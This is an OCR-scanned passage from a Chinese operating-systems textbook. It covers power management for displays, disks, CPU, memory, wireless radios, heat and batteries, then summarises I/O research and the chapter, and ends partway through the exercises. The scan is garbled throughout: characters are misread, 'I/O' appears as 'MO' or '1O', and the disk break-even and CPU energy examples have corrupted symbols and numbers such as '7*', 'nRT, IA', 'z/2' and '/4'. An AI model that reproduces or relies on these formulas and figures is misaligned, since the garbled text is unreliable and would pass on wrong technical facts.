口 2 中 的 时 候 ， 如 图 5-46a 所 示 ， 只 有 右 下 角 的 4 个 区 域 必 须 点 亮 。 其 他 12 个 区 域 可 以 是 黑暗 的 ， 节 省 了 
3/4 的 屏幕 功 耗 。 

当 用 户 移动 鼠标 到 窗口 1 时 ， 窗 口 2 的 区 域 可 以 变 暗 并 且 窗 口 1 后 面 的 区 域 可 以 开启 。 然 而 ， 因为 窗 
口 ! 模 跨 9 个 区 域 ， 所 以 需要 更 多 的 电能 。 如 果 窗 口 管理 器 能 够 感知 正在 发 生 的 事情 ， 它 可 以 通过 一 种 对 
齐 区 域 的 动作 自动 地 移动 窗口 1 以 适合 4 个 区 域 ， 如 图 5-46b 所 示 。 为 了 达到 这 一 从 9/16 全 功率 到 4/16 全 功 
率 的 缩减 ， 窗口 管理 器 必须 理解 电源 管理 或 者 能 够 从 系统 的 某 些 其 他 做 这 些 工作 的 部 分 接收 指令 。 更 加 
复杂 的 是 能 够 部 分 地 照 亮 不 完全 充满 的 窗口 〈 例 如 ， 包 含 文本 短线 的 窗口 可 以 在 右手 边 保持 黑暗 ) 。 

2. 硬盘 

另 一 个 主要 的 祸首 是 硬盘 ， 它 消耗 大 量 的 能 量 以 保持 高 速 旋转 ,即使 不 存在 存 取 操 作 。 许 多 计算 机 ， 
特别 是 笔记 本 电脑 ， 在 几 秒 钟 或 者 几 分 钟 不 活动 之 后 将 停止 磁盘 旋转 。 当 下 一 次 需要 磁盘 的 时 候 ， 磁 盘 
将 再 次 开始 旋转 。 不 幸 的 是 ， 一 个 停止 的 磁盘 是 休眠 而 不 是 睡眠， 因为 要 花费 相当 多 的 时 间 将 磁盘 再 次 
旋转 起 来 ， 导 致 用 户 感到 明显 的 延迟 。 

此 外 ， 重 新 启动 磁盘 将 消耗 相当 多 额外 的 能 量 。 因 此 ， 每 个 磁盘 都 有 一 个 特征 时 间 7, 为 它 的 盘 亏 平 
衡 点 ，7* 通 常 在 5~ 15s 的 范围 之 间 。 假 设 下 一 次 磁盘 存 取 预 计 在 未 来 的 某 个 时 间 ! 到 来 。 nRT, IA 
保持 磁盘 旋转 比 将 其 停止 然后 很 快 再 将 其 开启 要 消耗 更 少 的 能 量 。 如 果 r>7s， 那 么 使 得 磁盘 停止 而 后 在 
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较 长 时 间 后 再 次 启动 磁盘 是 十 分 值得 的 。 如 时 可 以 做 出 良好 的 预测 (例如 基于 过 去 的 存 取 模式 )， 那 么 
操作 系统 就 能 够 做 出 良好 的 关闭 预测 并 且 节 省 能 量 。 实 际 上 ， 大 多 数 操作 系统 是 保守 的 ， 往 往 是 在 几 分 
钟 不 活动 之 后 才 停止 磁盘 。 


区 域 Е b) 
图 5-46 针对 背光 照明 的 显示 器 使 用 区 域 : a) 当 窗口 2 被 选中 时 ， 该 窗口 不 移动 ， 
b) 当 窗口 1 被 选中 时 ， 该 窗口 移动 以 减少 照明 的 区 域 的 数目 


节省 磁盘 能 量 的 另 一 种 方法 是 在 RAM 中 拥有 一 个 大 容量 的 磁盘 高 速 组 在。 如 果 所 需要 的 数据 块 在 
高 速 缓存 中 ， 空 闲 的 磁盘 就 不 必 为 满足 读 操作 而 重新 启动 。 类 似 地 ， 如 果 对 磁盘 的 写 操作 能 够 在 高 速 组 
存 中 缓冲 ， 一 个 停止 的 磁盘 就 不 必 只 为 了 处 理 写 操作 而 重新 启动 。 磁 盘 可 以 保持 关闭 状态 直到 高 速 缓存 
填 满 或 者 读 缺 失 发 生 。 

避免 不 必要 的 磁盘 启动 的 另 一 种 方法 是 : 操作 系统 通过 发 送 消 息 或 信号 保持 将 磁盘 的 状态 通知 给 正 
在 运行 的 程序 。 某 些 程序 具有 可 以 自由 决定 的 写 操作 ， 这 样 的 写 操作 可 以 被 略 过 或 者 推迟 。 例 如 ， 一 个 
字 处 理 程序 可 能 被 设置 成 每 隔 几 分 钟 将 正在 编辑 的 文件 写 人 磁盘 。 如 果 字 处 理 程序 知道 当 它 在 正常 情况 
下 应 该 将 文件 写 到 磁盘 的 时 刻 磁盘 是 关闭 的 ， 它 就 可 以 将 本 次 写 操作 推迟 直到 下 一 次 磁盘 开启 时 ， 或 者 
直到 某 个 附加 的 时 间 逝 去 。 

3.CPU 

CPU 也 能 够 被 管理 以 节省 能 量 。 笔 记 本 电脑 的 CPU 能 够 用 软件 置 为 睡眠 状态 ， 将 电能 的 使 用 减少 到 
几乎 为 零 。 在 这 一 状态 下 CPU 惟一 能 做 的 事情 是 当中 断 发 生 时 醒 来 。 因 此 ， 只 要 CPU 变 为 空间 ， 无 论 是 
因为 等 待 MO 还 是 因为 没有 工作 要 做 ， 它 都 可 以 进入 睡眠 状态 。 

在 许多 计算 机 上 ， 在 CPU 电压 、 时 钟 周 期 和 电能 消耗 之 间 存 在 着 关系 。CPU 电 压 可 以 用 软件 降低 ， 
这 样 可 以 节省 能 量 但 是 也 会 近似 线性 地 ) 降低 时 钟 速度 。 由 于 电能 消耗 与 电压 的 平方 成 正比 ， 将 电压 
降低 一 半 会 使 CPU 的 速度 减 慢 一 半 ， 而 电能 消耗 降低 到 只 有 1/4。 

对 于 具有 明确 的 最 终 时 限 的 程序 而 言 ， 这 一 特性 可 以 得 到 利用 ， 例 如 多 媒体 观察 器 必须 每 40ms 解 压缩 
并 显示 一 帧 ， 但 是 如 果 它 做 得 太 快 它 就 会 变 得 空闲 。 假 设 CPU 全 速 运行 40ms 消 耗 了 x 焦 耳 能 量 ， 那 么 半 速 
运行 则 消耗 /4 焦耳 的 能 量 。 如 果 多 媒体 观察 器 能 够 在 20ms 内 解压 缩 并 显示 一 帧 ， 那 么 操作 系统 能 够 以 全 功 
率 运行 20ms， 然 后 关闭 20ms， 总 的 能 量 消耗 是 z/2 焦 耳 。 作 为 替代 ， 它 能 够 以 半 功 率 运行 并 且 恰好 满足 最 
终 时 限 ， 但 是 能 量 消耗 是 z4 焦 耳 。 以 全 速 和 全 功率 运行 某 个 时 间 间 隔 与 以 半 速 和 四 分 之 一 功率 运行 两 们 长 
时 间 的 比较 如 图 5-47 所 示 。 在 这 两 种 情况 下 做 了 相同 的 工作 ， 但 是 在 图 5-47b 中 只 消耗 了 一 半 的 能 量 。 
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图 5-47 а) 以 全 时 钟 速度 运行 ，b) 电压 减 半 使 时 钟 速度 前 减 一 半 并 且 功 率 前 减 到 1/4 
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类 似 地 ， 如 果 用 户 以 每 秒 1 个 字符 的 速度 键入 字符 ， 但 是 处 理 字符 所 需 的 工作 要 花费 100ms 的 时 间 ， 
操作 系统 最 好 检测 出 长 时 间 的 空闲 周期 并 且 将 CPU 放 慢 10 倍 。 简 而 言 之 ， 慢 速 运行 比 快速 运行 具有 更 高 
的 能 量 效率 。 

4. 内 存 

对 于 内 存 ， 存 在 两 种 可 能 的 选择 来 节省 能 量 。 首 先 ， 可 以 刷新 然后 关闭 高 速 缓存 。 高 速 缓存 总 是 能 够 
从 内 存 重新 加 载 而 不 损失 信息 。 重 新 加 载 可 以 动态 并 且 快 速 地 完成 ， 所 以 关闭 高 速 缓存 是 进入 睡眠 状态 。 

更 加 极端 的 选择 是 将 主 存 的 内 容 写 到 磁盘 上 ， 然 后 关闭 主 存 本 身 。 这 种 方法 是 休眠 ， 因 为 实际 上 所 
有 到 内 存 的 电能 都 被 切断 了 ， 其 代价 是 相当 长 的 重新 加 载 时 间 ， 尤 其 是 如 果 磁 盘 也 被 关闭 了 的 话 。 当 内 
存 被 切断 时 ，CPU 或 者 也 被 关闭 ， 或 者 必须 自 ROM 执 行 。 如 果 CPU 被 关闭 ， 将 其 唤醒 的 中 断 必 须 促使 它 
跳 转 到 ROM 中 的 代码 ， 从 而 能 够 重新 加 载 内 存 并 且 使 用 内 存 。 尽 管 存在 所 有 这 些 开 销 ， 将 内 存 关 闭 较 
长 的 时 间 周期 (例如 几 个 小 时 ) 也 许 是 值得 的 。 与 常常 要 花费 一 分 钟 或 者 更 长 时 间 从 磁盘 重新 启动 操作 
系统 相 比 ， 在 几 秒 钟 之 内 重新 启动 内 存 想来 更 加 受 欢 迎 。 

5. 无 线 通 信 

越 来 越 多 的 便携 式 计算 机 拥有 到 外 部 世界 (例如 Internet) 的 无 线 连接 。 无 线 通信 必需 的 无 线 电 发 
送 器 和 接收 器 是 头等 的 电能 贪 吃 者 。 特 别 是 ， 如 果 无 线 电 接收 器 为 了 侦 昕 到 来 的 电子 邮件 而 始终 开 着 ， 
电池 可 能 很 快 耗 干 。 另 一 方面 ， 如 果 无 线 电 设备 在 1 分 钟 空闲 之 后 关闭 ， 那么 就 可 能 会 错过 到 来 的 消息 ， 
这 显然 是 不 受 欢迎 的 。 

针对 这 一 问题 ，Kravets 和 Krishnan (1998) 提出 了 一 种 有 效 的 解决 方案 。 他 们 的 解决 方案 的 核心 利 
用 了 这 样 的 事实 ， 即 移动 的 计算 机 是 与 固定 的 基站 通信 ， 而 固定 基站 具有 大 容量 的 内 存 与 磁盘 并 且 没 有 
电源 限制 。 他 们 的 解决 方案 是 当 移动 计算 机 将 要 关闭 无 线 电 设备 时 ， 让 移动 计算 机 发 送 一 条 消息 到 基站 。 
从 那 时 起 ， 基 站 在 其 磁盘 上 缓冲 到 来 的 消息 。 当 移动 计算 机 再 次 打开 无 线 电 设备 时 ， 它 会 通知 基站 。 此 
刻 ， 所 有 积累 的 消息 可 以 发 送 给 移动 计算 机 。 

当 无 线 电 设备 关闭 时 ， 生 成 的 外 发 的 消息 可 以 在 移动 计算 机 上 缓冲 。 如 果 缓 冲 区 有 填 满 的 危险 ， 可 
以 将 无 线 电 设备 打开 并 且 将 排队 的 消息 发 送 到 基站 。 

应 该 在 何 时 将 无 线 电 设备 关闭 ?一 种 可 能 是 让 用 户 或 应 用 程序 来 决定 。 另 一 种 方法 是 在 若干 秒 的 空 
闲 时 间 之 后 将 其 关闭 。 应 该 在 何 时 将 无 线 电 设备 再 次 打开 ?用 户 或 应 用 程序 可 以 再 一 次 做 出 决定 ， 或 者 
可 以 周期 性 地 将 其 打开 以 检查 到 来 的 消息 并 且 发 送 所 有 排队 的 消息 。 当 然 ， 当 输出 缓冲 区 接近 填 满 时 也 
应 该 将 其 打开 。 各 种 各 样 的 其 他 休眠 方法 也 是 可 能 的 。 

6. 热量 管理 

一 个 有 一 点 不 同 但 是 仍然 与 能 量 相关 的 问题 是 热量 管理 。 现代 CPU 由 于 高 速度 而 会 变 得 非常 热 。 桌 
面 计算 机 通常 拥有 一 个 内 部 电 风扇 将 热 空气 吹出 机 箱 。 由 于 对 于 桌面 计算 机 来 说 减少 功率 消耗 通常 并 不 
是 一 个 重要 的 问题 ， 所 以 风 遍 通常 是 始终 开 着 的 。 

对 于 笔记 本 电脑 ， 情 况 是 不 同 的 。 操 作 系统 必须 连续 地 监视 温度 ， 当 温 度 接近 最 大 可 允许 温度 时 ， 
操作 系统 可 以 选择 打开 风扇 ， 这 样 会 发 出 噪音 并 且 消 耗 电能 。 作 为 替代 ， 它 也 可 以 借助 于 降低 屏幕 背光 、 
放 慢 CPU 速 度 、 更 为 激进 地 关闭 磁盘 等 来 降低 功率 消耗 。 

来 自用 户 的 某 些 输入 也 许 是 颇 有 价值 的 指导 。 例 如 ， 用 户 可 以 预先 设 定 风扇 的 噪音 是 令 人 不 快 的 ， 
因而 操作 系统 将 选择 降低 功率 消耗 。 

7. 电池 管理 

在 过 去 ， 电 池 仅仅 提供 电流 直到 其 耗 干 ， 在 耗 干 时 电池 就 不 会 再 有 电 了 。 现在 笔记 本 电脑 使 用 的 是 
智能 电池 ， 它 可 以 与 操作 系统 通信 。 在 请 求 时 ， 它 可 以 报告 其 状况 ， 例如 最 大 电压 、 当 前 电压 、 最 大 负 
荷 、 当 前 负荷 、 最 大 消耗 速率 、 当 前 消耗 速率 等 。 大 多 数 笔记 本 电脑 拥有 能 够 查询 与 显示 这 些 参数 的 程 
序 。 在 操作 系统 的 控制 下 ， 还 可 以 命令 智能 电池 改变 各 种 工作 参数 。 

某 些 笔记 本 电脑 拥有 多 块 电 地 。 当 操作 系统 检测 到 一 块 电池 将 要 用 完 时 ， 它 必须 适度 地 安排 转换 到 
下 一 块 电池 ， 在 转换 期 间 不 能 导致 任何 故障 。 当 最 后 一 块 电 地 濒临 耗 尽 时 ， 操 作 系统 要 负责 向 用 户 发 出 
警告 然后 促成 有 序 的 关机 ， 例 如 ， 确 保 文件 系统 不 被 破坏 。 
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8. 驱动 程序 接口 

Windows 系 统 拥有 一 个 进行 电源 管理 的 精巧 的 机 制 ， 称 为 ACPI (Advanced Configuration and Power 
Interface， 高 级 配置 与 电源 接口 )。 操 作 系统 可 以 向 任何 符合 标准 的 驱动 程序 发 出 命令 ， 要 求 它 报告 其 设 
备 的 性 能 以 及 它们 当前 的 状态 。 当 与 即 插 即 用 相 结合 时 ， 该 特性 尤其 重要 ， 因为 在 系统 刚刚 引导 之 后 ， 
操作 系统 甚至 还 不 知道 存在 什么 设备 ， 更 不 用 说 它们 关于 能 量 消 耗 或 电源 管理 的 属性 了 。 

ACPI 还 可 以 发 送 命令 给 驱动 程序 ， 命 令 它们 削减 其 功 耗 水 平 (当然 要 基于 早先 获悉 的 设备 性 能 ) 。 
还 存在 某 些 其 他 方式 的 通信 。 特 别 地 ， 当 一 个 设备 (例如 键盘 或 鼠标 ) 在 经 历 了 一 个 时 期 的 空闲 之 后 检 
测 到 活动 时 ， 这 是 一 个 信号 让 系统 返回 到 (接近 ) 正常 运转 。 


5.8.3 应 用 程序 问题 

到 目前 为 止 ， 我 们 了 解 了 操作 系统 能 够 降低 各 种 类 型 的 设备 的 能 量 使 用 量 的 方法 。 但 是 ， 还 存在 着 
另 一 种 方法 :指示 程序 使 用 较 少 的 能 量 ， 即使 这 意味 着 提供 低劣 的 用 户 体验 (低劣 的 体验 也 比 电池 耗 干 
并 且 屏 幕 炮 灭 时 没有 体验 要 好 )。 一 般 情 况 下 ， 当 电 字 的 电荷 低 于 某 个 闹 值 时 传递 这 样 的 信息 ， 然 后 由 
应 用 程序 负责 在 退化 性 能 以 延长 电池 寿命 与 维持 性 能 并 且 冒 着 用 光电 池 的 危险 之 间作 出 决定 。 

这 里 出 现 的 一 个 问题 是 程序 怎样 退化 其 性 能 以 节省 能 量 ? Flinn 和 Satyanarayanan (2004) 研究 了 这 
一 问题 ， 他 们 提供 了 退化 的 性 能 怎样 能 够 节省 能 量 的 4 个 例子 。 我 们 现在 就 看 一 看 这 些 例子 。 

在 他 们 的 研究 中 ， 信 息 以 各 种 形式 呈现 给 用 户 。 当 退 化 不 存在 时 ， 呈 现 的 是 最 优 可 能 的 信息 。 当 退 
化 存在 时 ， 呈 现 给 用 户 的 信息 的 保 真 度 OERE) 比 它 能 够 达到 的 保 真 度 要 差 。 我 们 很 快 就 会 看 到 这 样 
的 例子 。 

为 了 测量 能 量 使 用 量 ，Flinn 和 Satyanarayanan 发 明了 一 个 称 为 PowerScope 的 软件 工具 。 PowerScope 
所 做 的 事情 是 提供 一 个 程序 的 电能 使 用 量 的 概要 剖析 。 为 了 使 用 PowerScope， 计 算 机 必须 通过 一 个 软件 
控制 的 数字 万 用 表 接 通 一 个 外 部 电源 。 使 用 万 用 表 ， 软件 可 以 读 出 从 电源 流 进 的 电流 的 毫 安 数 ， 并 且 因 
此 确定 计算 机 正在 消耗 的 瞬时 功率 。 PowerScope 所 做 的 工作 是 周期 性 地 采样 程序 计数 器 和 电能 使 用 量 并 
且 将 这 些 数据 写 到 一 个 文件 中 。 当 程序 终止 后 ， 对 文件 进行 分 析 就 可 以 给 出 每 个 过 程 的 能 量 使 用 量 。 这 
些 测 量 形成 了 他 们 的 观察 结果 的 基础 。 他 们 还 利用 硬件 能 量 节约 测量 并 且 形成 了 基准 线 ， 对 照 该 基准 线 
测量 了 退化 的 性 能 。 

测量 的 第 一 个 程序 是 一 个 视频 播放 器 。 在 未 退化 模式 下 ， 播放 器 以 全 分 辩 率 和 彩色 方式 每 秒 播放 30 
ш. 一 种 进化 形式 是 舍弃 彩色 信息 并 且 以 黑白 方式 显示 视频 。 另 一 种 退化 形式 是 降低 帧 速率 ， 这 会 导致 
闪烁 并 且 使 电影 呈现 拌 动 的 质量 。 还 有 一 种 退化 形式 是 在 两 个 方向 上 减少 像素 数目 ， 或 者 是 通过 降低 空 
间 分 辩 率 ， 或 者 是 使 显示 的 图 像 更 小 。 对 这 种 类 型 的 测量 表明 节省 了 大 约 30% 的 能 量 。 

第 二 个 程序 是 一 个 语音 识别 器 ， 它 对 麦克 风 进 行 采样 以 构造 波形 。 该 波形 可 以 在 笔记 本 电脑 上 进行 
分 析 ， 也 可 以 通过 无 线 链 路 发 送 到 固定 计算 机 上 进行 分 析 ， 这 样 做 节省 了 CPU 消耗 的 能 量 但 是 会 为 无 线 
电 设备 而 消耗 能 量 。 通过 使 用 比较 小 的 词汇 量 和 比较 简单 的 声学 模型 可 以 实现 退化 ， 这 样 做 的 收益 大 约 
是 35% 。 

第 三 个 例子 是 一 个 通过 无 线 链 路 获取 地 图 的 地 图 观察 器 。 退化 在 于 或 者 将 地 图 修剪 到 比较 小 的 尺 ， 
或 者 告诉 远程 服务 器 省 略 比较 小 的 道路 ， 从 而 需要 比较 少 的 位 来 传输 。 这 样 获得 的 收益 大 约 也 是 35% 。 

第 四 个 实验 是 传送 JPEG 图 像 到 一 个 Web 浏 览 器 。 JPEG 标 准 允许 各 种 算法 ， 在 图 像 质量 与 文件 大 小 
之 间 进 行 中 。 这 里 的 收益 平均 只 有 9%。 总 而 言 之 ， 实验 表明 通过 接受 一 些 质量 退化 ， 用 户 能 够 在 一 个 
给 定 的 电池 上 运行 更 长 的 时 间 。 

5.9 有 关 输 入 /输出 的 研究 

关于 输入 /输出 有 大 量 的 研究 ， 但 是 大 多 数 研究 集中 在 特别 的 设备 上 ， 而 不 是 一 般 性 的 MO。 研究 的 
目标 常常 是 想方设法 改进 性 能 。 

磁盘 系统 是 一 个 恰当 的 事例 。 磁盘 痛 调 度 算法 曾经 是 一 个 流行 的 研究 领域 (Bachmat 和 Braverman , 
2006，Zarandioon 和 Thomasim，2006) ， 磁 盘 阵列 也 是 如 此 (Arnan 等 人 ，2007)。 优 化 完整 的 1O 路 径 也 
引起 了 人 们 的 兴趣 (Riska 等 人 ，2007) 。 还 有 关于 磁盘 工作 量 特性 的 研究 (Riska 和 Riedel，2006)。 一 
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个 新 的 与 磁盘 相关 的 研究 领域 是 高 性 能 闪存 盘 (Birrell 等 人 ，2007，Chang，2007)。 设 备 驱动 程序 也 得 
到 某 些 必要 的 关注 (Ball 等 人 ，2006，Ganapathy 等 人 ，2007，Padioleau 等 人 ，2006) 。 

另 一 种 新 的 存储 技术 是 MEMS (Micro-Electrical-Mechanical System， 微 电子 机 械 系 统 ) ， 它 潜在 地 
可 以 取代 磁盘 ， 或 者 至 少 是 磁盘 的 补充 (Rangaswami 等 人 ，2007，Yu 等 人 ，2007)。 另 一 个 新 兴 的 研究 
领域 是 如 何在 磁盘 控制 器 内 部 最 好 地 利用 CPU， 例 如 ， 为 了 改进 性 能 (Gurumurthi，2007) 或 者 是 为 了 
检测 病毒 (Paul 等 人 ，2005 ) 。 

稍稍 让 人 吃惊 的 是 ， 身 份 低下 的 时 钟 仍然 是 研究 的 主题 。 为 了 提供 更 好 的 分 辨 率 ， 某 些 操作 系统 在 
1000Hz 的 时 钟 下 运行 ， 这 会 导致 相当 大 的 开销 。 摆 脱 这 一 开销 正 是 新 兴 的 研究 课题 (Etsion 等 人 ， 
2003，Tsafir 等 人 ，2005) 。 

瘦 客户 机 也 是 相当 引 人 注目 的 研究 主题 (Kissler 和 Hoyt，2005，Ritschard，2006，Schwartz 和 
Guerrazzi, 2005), 

考虑 到 研究 笔记 本 电脑 的 为 数 众多 的 计算 机 科学 家 ， 并 且 考 虑 到 大 多 数 笔记 本 电脑 微不足道 的 电池 
寿命 ,看 到 在 利用 软件 技术 减少 电能 消耗 方面 有 巨大 的 研究 兴趣 就 不 足 为 奇 了 。 研 究 中 的 特别 主题 包括 ; 
编写 应 用 程序 代码 以 最 大 化 磁盘 空闲 时 间 (Son 等 人 ，2006) ， 当 使 用 比较 少时 让 磁盘 降低 转速 
(Gurumurthi 等 人 ，2003) ， 使 用 程序 模型 预测 无 线 网 卡 何 时 可 以 关闭 (Hom 和 Kremer，2003) ， 节 省 
VoIP 的 电能 (Gleeson 等 人 ，2006)， 调 查 安全 性 的 能 量 代价 (Aaraj 等 人 ，2007) ， 以 能 源 效 率 高 的 方式 
执行 多 媒体 调度 (Yuan 和 Nahrstedt，2006)， 以 及 让 内 置 的 摄像 机 检测 是 否 有 人 在 看 显示 器 并 且 在 没有 
人 看 的 时 候 将 其 关闭 (Dalton 和 Ellis，2003)。 在 低 端 ， 另 一 个 热门 话题 是 传感器 网 络 中 能 源 的 使 用 
(Min 等 人 ，2007; -Wang 和 Xiao，2006) 。 而 在 高 端 ， 在 大 型 服务 器 园区 中 节省 能 源 也 引起 人 们 的 关注 
(Fan 等 人 ，2007，Tolentino 等 人 ，2007) 。 


5.10 小 结 

输入 /输出 是 一 个 经 常 被 忽略 但 是 十 分 重要 的 话题 。 任 何 一 个 操作 系统 都 有 大 量 的 组 分 与 JO 有 关 。 
IO 可 以 用 三 种 方式 来 实现 。 第 一 是 程序 控制 1O， 在 这 种 方式 下 主 CPU 输 入 或 输出 每 个 字 节 或 字 并 且 亲 
置 在 一 个 密封 的 循环 中 等 待 ， 直 到 它 能 够 获得 或 者 发 送 下 一 个 字 节 或 字 。 第 二 是 中 断 驱动 的 1O {ЕХ 
种 方式 下 CPU 针对 一 个 字 节 或 字 开 始 I/O 传 送 并 且 离开 去 做 别 的 事情 ， 直 到 一 个 中 断 到 来 发 出 信号 通知 
IO 完成 。 第 三 是 DMA， 在 这 种 方式 下 有 一 个 单独 的 芯片 管理 着 一 个 数据 块 的 完整 传送 过 程 ， 只 有 当 整 
个 数据 块 完成 传送 时 才 引 发 一 个 中 断 。 

IO 可 以 组 织 成 4 个 层次 : 中 断 服 务 程序 、 设 备 驱动 程序 、 与 设备 无 关 的 IO 软件 和 运行 在 用 户 空间 
的 LO 库 与 假 脱 机 程序 。 设 备 驱动 程序 处 理 运行 设备 的 细节 并 且 向 操作 系统 的 其 余部 分 提供 统一 的 接口 。 
与 设备 无 关 的 MO 软件 做 类 似 缓冲 与 错误 报告 这 样 的 事情 。 

盘 具 有 多 种 类 型 ， 包 括 磁盘 、RAID 和 各 类 光盘 。 磁 盘 辟 调度 算法 经 常用 来 改进 磁盘 性 能 ， 但 是 虚 
拟 几何 规格 的 出 现 使 事情 变 得 十 分 复杂 。 通 过 将 两 块 磁盘 组 成 一 对 ， 可 以 构造 稳定 的 存储 介质 ， 具 有 某 
些 有 用 的 性 质 。 

时 钟 可 以 用 于 跟踪 实际 时 间 ， 限 制 进程 可 以 运行 多 长 时 间 ， 处 理 监视 定时 器 ， 以 及 进行 记 账 。 

面向 字符 的 终端 具有 多 种 多 样 的 问题 ， 这 些 问题 涉及 特殊 的 字符 如 何 输入 以 及 特殊 的 转 义 序列 如 何 
输出。 输入 可 以 采用 原始 模式 或 加 工 模式 ， 取 决 于 程序 对 于 输入 需要 有 多 少 控制 。 针 对 输出 的 转 义 序列 
控制 着 光标 的 移动 并 且 克 许 在 屏幕 上 插入 和 副 除 文本 。 

大 多 数 UNIX 系 统 使 用 X 窗 口 系统 作为 用 户 界面 的 基础 。 它 包含 与 特殊 的 库 相 绑 定 并 发 出 绘图 命令 
的 程序 ， 以 及 在 显示 器 上 执行 绘图 的 服务 器 。 

许多 个 人 计算 机 使 用 GUI 作为 它们 的 输出 。GUI 基 于 WIMP 范 式 : 窗口 、 图 标 、 菜 单 和 定点 设备 。 
基于 GUI 的 程序 一 般 是 事件 驱动 的 ， 当 键盘 事件 、 鼠 标 事件 和 其 他 事件 发 生 时 立刻 会 被 发 送 给 程序 以 便 
处 理 。 在 UNIX 系 统 中 ，GUI 几 乎 总 是 运行 在 X 之 上 。 

瘦 客 户 机 与 标准 PC 相 比 具有 某 些 优势 ， 对 用 户 而 言 ， 值 得 注意 的 是 简单 性 并 且 需 要 较 少 维 护 。 对 
THINC 瘦 客户 机 进行 的 实验 表明 ， 以 五 条 简单 的 原 语 就 能 制造 出 具有 良好 性 能 的 客户 机 ， 即 使 对 于 视频 
也 是 如 此 。 


葵 入 / 翘 出 
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最 后 ， 电 源 管 理 对 于 笔记 本 电脑 来 说 是 一 个 主要 的 问题 ， 因 为 电池 寿命 是 有 限 的 。 操 作 系统 可 以 采 
用 各 种 技术 来 减少 功率 消耗 。 通 过 牺 性 某 些 质量 以 换取 更 长 的 电池 寿命 ， 应 用 程序 也 可 以 做 出 贡献 。 


习题 


1. 芯片 技术 的 进展 已 经 使 得 将 整个 控制 器 包括 所 
有 总 线 访问 逻辑 放 在 一 个 便宜 的 芯片 上 成 为 可 
能 。 这 对 于 图 1-5 的 模型 具有 什么 影响 ? 

:已 知 图 5-1 列 出 的 速度 ， 是 否 可 能 以 全 速 从 一 台 
扫描 仪 扫描 文档 并 且 通 过 802.11g 网 络 对 其 进行 
传输 ?请 解释 你 的 答案 。 

,图 5-3b 显 示 了 即使 在 存在 单独 的 总 线 用 于 内 存 
和 用 于 LO 设备 的 情况 下 使 用 内 存 映射 1O 的 一 
种 方法 ， 也 就 是 说 ， 首 先 尝试 内 存 总 线 ， 如 果 
失败 则 尝试 IO 总 线 。 一 名 聪明 的 计算 机 科学 专 
业 的 学 生 想 出 了 一 个 改进 办 法 : 并 行 地 尝试 两 
个 总 线 ， 以 加 快 访问 1/O 设 备 的 过 程 。 你 认为 这 
个 想法 如 何 ? 

假设 一 个 系统 使 用 DMA 将 数据 从 磁盘 控制 器 传 
送 到 内 存 。 进 一 步 假设 平均 花费 nns 获 得 总 线 ， 
并 且 花 费 ans 在 总 线 上 传送 一 个 字 (n>>b)。 在 
CPU 对 DMA 控 制 器 进行 编程 之 后 ， 如 果 (а) 
采用 一 次 一 字模 式 ，(b) 采用 突 发 模式 ， 从 磁 
盘 控 制 器 到 内 存 传送 1000 个 字 需 要 多 少时 间 ? 
假设 向 磁盘 控制 器 发 送 命令 需要 获取 总 线 以 传 
输 一 个 字 ， 并 且 应 答 传输 也 需要 获取 总 线 以 传 
输 一 个 字 。 

:假设 一 台 计算 机 能 够 在 10ns 内 读 或 者 写 一 个 内 
存 字 ， 并 且 假 设 当中 断 发 生 时 ， 所 有 32 位 寄存 
器 连同 程序 计数 器 和 PSW 被 压 人 堆栈 。 该 计算 
机 每 秒 能 够 处 理 的 中 断 的 最 大 数目 是 多 少 ? 
CPU 体系 结构 设计 师 知道 操作 系统 编写 者 痛恨 
不 精确 的 中 断 。 取 悦 于 OS 人 群 的 一 种 方法 是 当 
得 到 一 个 中 断 信 号 通知 时 ， 让 CPU 停止 发 射 指 
令 ， 但 是 允许 当前 正在 执行 的 指令 完成 ， 然 后 
强制 中 断 。 这 一 方案 是 否 有 缺点 ? 请 解释 你 的 
答案 。 

在 图 5-9b 中 ， 中 断 直到 下 一 个 字符 输出 到 打印 
机 之 后 才 得 到 应 答 。 中 断 在 中 断 服务 程序 开始 
时 立刻 得 到 应 答 是 否 同样 可 行 ?如 果 是 ， 请 给 出 
像 本 书 中 那样 在 中 断 服务 程序 结束 时 应 答 中 断 
的 一 个 理由 。 如 果 不 是 ， 为 什么 ? 

.一 台 计 算 机 具有 如 图 1-6a 所 示 的 三 阶段 流水 线 。 
在 每 一 个 时 钟 周期 ， 一 条 新 的 指令 从 PC 所 指向 
的 地 址 处 的 内 存 中 取出 并 放 入 流水 线 ， 同 时 PC 
值 增加 。 每 条 指令 恰好 占据 一 个 内 存 字 。 已 经 
在 流水 线 中 的 指令 每 个 时 钟 周期 前 进 一 个 阶段 。 
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当中 断 发 生 时 ， 当 前 PC 压 和 堆栈， 并且 将 PC 设 
置 为 中 断 处 理 程序 的 地 址 。 然 后 ， 流 水 线 右 移 
一 个 阶段 并 且 中 断 处 理 程序 的 第 一 条 指令 被 取 
入 流水 线 。 该 机 器 具有 精确 的 中 断 吗 ? 请 解释 你 
的 答案 。 

9. 一 个 典型 的 文本 打印 页 面包 含 50 行 ， 每 行 80 个 
字符 。 设 想 某 一 台 打印 机 每 分 钟 可 以 打印 6 个 页 
面 ， 并 且 将 字符 写 到 打印 机 输出 寄存 器 的 时 间 
很 短 以 至 于 可 以 忽略 。 如 果 打 印 每 一 个 字符 要 
请 求 一 次 中 断 ， 而 进行 中 断 服务 要 花费 总 计 
50ks 的 时 间 ， 那 么 使 用 中 断 驱 动 的 1/0 来 运行 该 
打印 机 有 没有 意义 ? 

10. 请 解释 OS 如 何 帮助 安装 新 的 驱动 程序 而 无 须 
重新 编译 OS。 

11. 以 下 各 项 工作 是 在 四 个 IO 软件 层 的 哪 一 层 完 
成 的 ? 

а) 为 一 个 磁盘 读 操作 计算 磁道 、 遍 区、 磁头 。 
b) 向 设备 寄存 器 写 命令 。 

с) 检查 用 户 是 否 允 许 使 用 设备 。 

d) 将 二 进 制 整数 转换 成 ASCII 码 以 便 打印 。 

12. 一 个 局 域 网 以 如 下 方式 使 用 ， 用 户 发 出 一 个 系 
统 调 用 ， 请 求 将 数据 包 写 到 网 上 ， 然 后 操作 系 
统 将 数据 复制 到 一 个 内 核 缓冲 区 中 ， 再 将 数据 
复制 到 网 络 控制 器 接口 板 上 。 当 所 有 数据 都 安 
全 地 存放 在 控制 器 中 时 ， 再 将 它们 通过 网 络 以 

10Mb/s 的 速率 发 送 。 在 每 一 位 被 发 送 后， 接收 
的 网 络 控制 器 以 每 微 秒 一 位 的 速率 保存 它们 。 
当 最 后 一 位 到 达 时 ， 目 标 CPU 被 中 断 ， 内 核 将 
新 到 达 的 数据 包 复制 到 内 核 缓冲 区 中 进行 检 
